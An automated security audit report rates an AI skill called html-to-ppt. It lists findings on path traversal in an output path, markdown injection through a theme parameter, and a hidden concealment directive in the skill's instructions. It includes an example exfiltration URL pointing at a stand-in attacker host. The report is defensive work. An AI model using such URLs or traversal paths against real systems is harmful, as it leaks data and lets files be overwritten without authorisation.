Trust Assessment
html-to-ppt received a trust score of 73/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 0 critical, 1 high, 2 medium, and 1 low severity. Key findings include Covert behavior / concealment directives, Arbitrary file write due to unvalidated output path, Markdown content injection possible via unvalidated 'theme' parameter.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Arbitrary file write due to unvalidated output path The `markdown_to_pptx` function takes an `output_path` argument directly from user input and uses it to specify the output file location for `marp-cli`. There is no validation or sanitization of this path, allowing an attacker to specify arbitrary file paths, including absolute paths or paths using `../` traversal, to write files to any location on the file system where the skill has write permissions. This could lead to overwriting critical system files, creating malicious files in sensitive directories, or other forms of system compromise. Implement strict validation and sanitization of the `output_path` argument. This could involve ensuring the path is relative to a designated, sandboxed output directory, disallowing absolute paths, disallowing path traversal sequences (`../`), and using `os.path.abspath` to check if the resolved path is within an allowed directory. Consider using `tempfile.mkdtemp()` to create a secure temporary directory for all output, and only allowing the user to specify a filename within that directory. | LLM | SKILL.md:275 | |
| MEDIUM | Markdown content injection possible via unvalidated 'theme' parameter The `markdown_to_pptx` function constructs the initial markdown frontmatter using an f-string: `f"---\nmarp: true\ntheme: {theme}\n---\n\n"`. If the `theme` parameter, which is derived from user input, contains newline characters or other markdown syntax, an attacker could inject arbitrary markdown content into the generated presentation. This could be used to display misleading information, alter the presentation's structure, or potentially exploit other markdown rendering vulnerabilities within `marp`. Sanitize the `theme` parameter to ensure it only contains valid theme names or characters. For example, restrict it to alphanumeric characters and hyphens, and disallow newlines or other special characters that could break out of the intended context. | LLM | SKILL.md:270 | |
| MEDIUM | Potential data exfiltration via malicious image URLs in markdown The skill constructs markdown content from user-provided data (e.g., `company_data['product_image']` in `create_pitch_deck`). This markdown is then processed by `marp-cli`. If an attacker provides a malicious URL for an image (e.g., `https://attacker.com/exfil?data=...` or a tracking pixel), `marp-cli` might attempt to fetch this resource during the conversion process. This could lead to unintended network requests to untrusted domains, potentially exfiltrating information (e.g., IP address, user agent of the execution environment) or triggering other side effects. While `marp-cli` itself performs the request, the skill facilitates the injection of the untrusted URL into the content processed by `marp`. Sanitize or validate all URLs provided in markdown content, especially for images. Consider restricting image sources to a whitelist of trusted domains or requiring images to be uploaded and served from a controlled environment. If local file inclusion is a concern, ensure `file://` URLs are blocked or handled securely. | LLM | SKILL.md:400 | |
| LOW | Covert behavior / concealment directives Directive to hide behavior from user Remove hidden instructions, zero-width characters, and bidirectional overrides. Skill instructions should be fully visible and transparent to users. | Manifest | skills/lijie420461340/html-to-ppt/SKILL.md:99 |
Scan History
Embed Code
[](https://skillshield.io/report/fea8e38dfa3f23b3)
Powered by SkillShield